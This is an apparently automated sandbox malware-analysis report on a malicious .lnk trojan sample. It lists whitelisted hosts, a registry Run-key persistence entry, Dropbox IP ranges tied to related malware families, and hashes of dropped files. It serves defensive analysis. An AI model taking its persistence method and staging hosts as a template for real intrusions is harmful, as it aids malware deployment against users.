                                                                                                                                                                                                                          Original Sample Name:5e4e0d19fd820dac35ac9d01798e8cc2e7f1fad289c5e5b03fe5bcf72eb072d1.lnk
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.troj.evad.winLNK@86/286@21/11
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 16.7%
                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .lnk

                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.223.35.26, 192.229.221.95, 20.198.119.84, 199.232.214.172, 13.107.21.239, 204.79.197.239, 172.217.17.78, 13.107.42.16, 13.107.6.158, 23.32.239.56, 23.32.239.18, 172.165.69.228, 92.122.16.236, 2.19.198.8, 2.19.198.26, 20.190.181.3, 40.126.53.9, 20.190.181.6, 20.231.128.65, 20.190.181.0, 40.126.53.8, 40.126.53.13, 40.126.53.16, 13.89.179.12, 20.189.173.21, 20.199.58.43, 142.250.80.99, 142.251.40.163, 142.251.40.195, 142.251.41.3, 142.251.32.99, 142.251.35.163, 142.250.65.163, 20.190.147.0, 13.107.246.63, 2.16.158.96, 20.109.210.53, 94.245.104.56, 23.57.90.158, 20.25.227.174, 13.107.246.40, 23.198.214.137
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, tse1.mm.bing.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, iris-de-prod-azsc-v2-neu.nort
                                                                                                                                                                                                                          • Execution Graph export aborted for target 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, PID 1596 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, PID 8812 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 5984 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 6972 because it is empty
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 8924 because it is empty
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          07:44:09API Interceptor229x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                          07:44:21API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                          07:45:26API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                          13:45:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nuinsa C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe
                                                                                                                                                                                                                          13:45:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nuinsa C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe

                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          162.125.69.18RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                              sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                  Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                    https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                        122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                          0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                            KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                              162.125.69.15https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                  pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                    IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                      873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                        0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                          KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                            cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                              Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse

                                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  fg.microsoft.map.fastly.netR4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  bg.microsoft.map.fastly.netLbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172

                                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  DROPBOXUSRFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.21.1
                                                                                                                                                                                                                                                                  hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                  kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 162.125.113.170
                                                                                                                                                                                                                                                                  sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                  DROPBOXUSRFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.21.1
                                                                                                                                                                                                                                                                  hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                  kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 162.125.113.170
                                                                                                                                                                                                                                                                  sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.65.18

                                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  1138de370e523e824bbca92d049a3777CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  UYJ0oreVew.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  L1SrJoDQvG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0ZGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  Ball - Temp.data for GCMs.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                  • 173.222.162.64
                                                                                                                                                                                                                                                                  6271f898ce5be7dd52b0fc260d0662b3https://registry.paratext.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 150.171.27.10
                                                                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eg1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15

                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.7485204010554026
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH07:9JZj5MiKNnNhoxuN
                                                                                                                                                                                                                                                                  MD5:71A83EBE2804654A174E2E9CE366F63B
                                                                                                                                                                                                                                                                  SHA1:14AC7C3A0191237E5549EBE7B9DECA4605C48BEC
                                                                                                                                                                                                                                                                  SHA-256:A99119EE0AEA56F7EA769825853038DA0E16FF7C66B19E345907E95E7BB79FEF
                                                                                                                                                                                                                                                                  SHA-512:C1E7CC3338135E015FE165EBEBC167BBB8A4711D9DA3FD523F81D3D3B1B2101966F709FFB342FBD45901A9D981300B1F17E6C3F7AE7F20B0A88235788F6B7CDC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:Extensible storage user DataBase, version 0x620, checksum 0x274510ce, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.7556150273871898
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL
                                                                                                                                                                                                                                                                  MD5:A7D020E5CEBD83F8136579FBE6F4434A
                                                                                                                                                                                                                                                                  SHA1:1F1AFF2A1F447701E86D55135B10969DFF9F3E52
                                                                                                                                                                                                                                                                  SHA-256:256B469F86F38AC5F624AC7B0F3D5E94784D87E192C07D1EE63AB6FA60C25C7A
                                                                                                                                                                                                                                                                  SHA-512:A9AAF2CE6229B125BD591CC15C6FE5FFBF8DE876D8114B3C1726E4B6D6AC289798D7C271405CD4BAB517EC13020B9561895F5DC7351A6956554189B653C89F25
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:'E..... .......7.......X\...;...{......................0.e......!...{?..,...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................EY..,...|/.................-....,...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0797367100912043
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:EJlXKYeHOCNaAPaU1luo7XlluxmO+l/SNxOf:EJlXKzHOCNDPaUf71gmOH
                                                                                                                                                                                                                                                                  MD5:6FFBF2E0974782C71741A4952E956FDF
                                                                                                                                                                                                                                                                  SHA1:6A254BC90AFFA9DE0768F4E8A28C92A858263B2D
                                                                                                                                                                                                                                                                  SHA-256:77CF4B2EE73099A8E46ED10DFF5B9B587CFF66B4B003F5801BE9CE90F37E730C
                                                                                                                                                                                                                                                                  SHA-512:E8F46DFEF10D9A060757B69A841C2CAB7AECD161250C54EBC631BB8AF406C6BADDDDBEAF90AED0C67DBBEA49FD70EA5FC35272B99D0BA20CE0A4E60B5F89BCEC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:V.z......................................;...{...,...|...!...{?..........!...{?..!...{?..g...!...{?.................-....,...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_fcceb38b-a008-4538-b04a-57bbd931167f\Report.wer

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6603351066530814
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:+kF6P/3ebJqigKJ/s3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX7:3cvCHn/xR0apYKjqzuiF8Z24lO8JO
                                                                                                                                                                                                                                                                  MD5:8DDF51735973E8735C6C0E3B1AD85D2C
                                                                                                                                                                                                                                                                  SHA1:893DE7ABFBC5128CE7983E12CC922801DA4136FF
                                                                                                                                                                                                                                                                  SHA-256:FC40E6348C8ECF81ED9D153207190B05BA397DE355E5A3979DB1273F0EEB98BE
                                                                                                                                                                                                                                                                  SHA-512:7776E66581C0094D3AA2C8D7BF122A0554FA4ED898D7ECFB2B240BEC64ABD4EC676A5EC59632A1EE19FA366DDDA55781DC7603C9E3B6924316AA07C3ECD8BE69
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.8.5.9.2.0.7.3.4.8.6.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.8.5.9.2.1.2.1.9.2.3.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.c.e.b.3.8.b.-.a.0.0.8.-.4.5.3.8.-.b.0.4.a.-.5.7.b.b.d.9.3.1.1.6.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.a.4.6.5.0.d.-.e.4.9.e.-.4.9.6.2.-.a.f.d.6.-.9.8.8.3.4.4.9.f.8.9.8.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.3.5.8.-.0.0.0.1.-.0.0.1.5.-.c.4.9.f.-.2.f.d.b.1.3.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA467.tmp.dmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 12:45:20 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):47174
                                                                                                                                                                                                                                                                  Entropy (8bit):1.2881922949478246
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:5V8TmyKRdn9HynE7i78PfEyi+aVRbND22ReHodWI4rIg8:QCy4CqO8PfP9yTIHos8
